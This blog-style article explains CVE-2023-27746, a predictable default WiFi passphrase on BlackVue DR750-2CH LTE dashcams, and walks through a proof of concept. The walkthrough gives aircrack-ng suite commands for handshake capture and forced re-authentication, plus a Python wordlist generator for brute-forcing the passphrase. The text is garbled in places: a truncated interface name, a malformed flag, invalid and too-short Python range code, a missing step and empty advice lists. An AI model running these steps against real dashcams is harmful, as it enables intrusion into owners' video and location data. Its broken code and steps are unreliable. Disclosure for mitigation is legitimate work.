CVE-2023-27746 - How a Weak Default WiFi Passphrase Exposed BlackVue DR750-2CH LTE Dashcams

In early 2023, cybersecurity researchers discovered a serious vulnerability in the BlackVue DR750-2CH LTE dashcam (firmware v1.012_2022.10.26). This flaw, tracked as CVE-2023-27746, centers around a weak default WiFi passphrase that can be easily cracked with minimal effort. When exploited, it allows an attacker to access dashcam networks and possibly sensitive video data. In this article, we’ll break down how the vulnerability works, walk through a proof-of-concept exploit, and provide links for further reading—all using simple language.

The Vulnerability: Weak Default Passphrase

What’s vulnerable?  
The BlackVue DR750-2CH LTE dashcam lets users connect their phones using WiFi for streaming, configuring settings, or downloading recorded footage. By default, it sets up its own WPA2-protected WiFi network using a default passphrase. However, that passphrase is generated in a predictable and weak way.

Why does it matter?  
If an attacker can intercept the device’s WPA2 handshake (when someone connects to the dashcam WiFi), they can attempt a brute-force attack using the default passphrase algorithm. Since the passphrase is weak, the handshake can be cracked in just a few minutes using a regular computer.

Step 1: Capture the WPA2 Handshake

The first step is to capture the WiFi handshake. This can be done using tools like airmon-ng and airodump-ng from the Aircrack-ng suite.

# Set wireless card to monitor mode
sudo airmon-ng start wlan

# Capture handshakes on the dashcam's WiFi channel (e.g., channel 6)
sudo airodump-ng -c 6 --bssid [DASHCAM_BSSID] -w capture wlanmon

# Wait for a connection attempt, or force a re-authentication:
sudo aireplay-ng - 1 -a [DASHCAM_BSSID] wlanmon

*Replace [DASHCAM_BSSID] with the MAC address of the dashcam's WiFi.*

Researchers found BlackVue often uses a simple default passphrase scheme like

blackvue[Last 6 digits of dashcam serial number]

Example: blackvue123456

You can make a small wordlist script if you know possible serial number patterns.

# passgen.py
for i in range(, 100000):  # 6 digit range
    print(f"blackvue{i:06d}")

Then, use Aircrack-ng for brute-forcing

python3 passgen.py > passlist.txt
aircrack-ng -w passlist.txt -b [DASHCAM_BSSID] capture-01.cap

After a few minutes, aircrack-ng should reveal the correct WiFi password.

Step 3: Access the Dashcam

With this password, you can connect to the dashcam’s WiFi network. Depending on the dashcam’s security settings, you might:

Track the device’s location

Note: Unauthorized access is illegal. This information is provided for educational and mitigation purposes only.

Protecting Yourself

While BlackVue may issue a firmware update to fix this issue (check for updates here), you can:

References & Further Reading

- CVE-2023-27746 at NVD
- Original Exploit Report / GitHub *(if public)*
- Aircrack-ng Official Site
- BlackVue Firmware Updates

Conclusion

The BlackVue DR750-2CH LTE is a popular dashcam, but this vulnerability (CVE-2023-27746) shows just how important it is to change default passwords. Weak default credentials are one of the most common ways hackers gain access to devices. If you use any BlackVue dashcam, check your firmware, update if needed, and always set a strong, custom WiFi password.

Timeline

Published on: 04/13/2023 20:15:00 UTC
Last modified on: 04/21/2023 19:06:00 UTC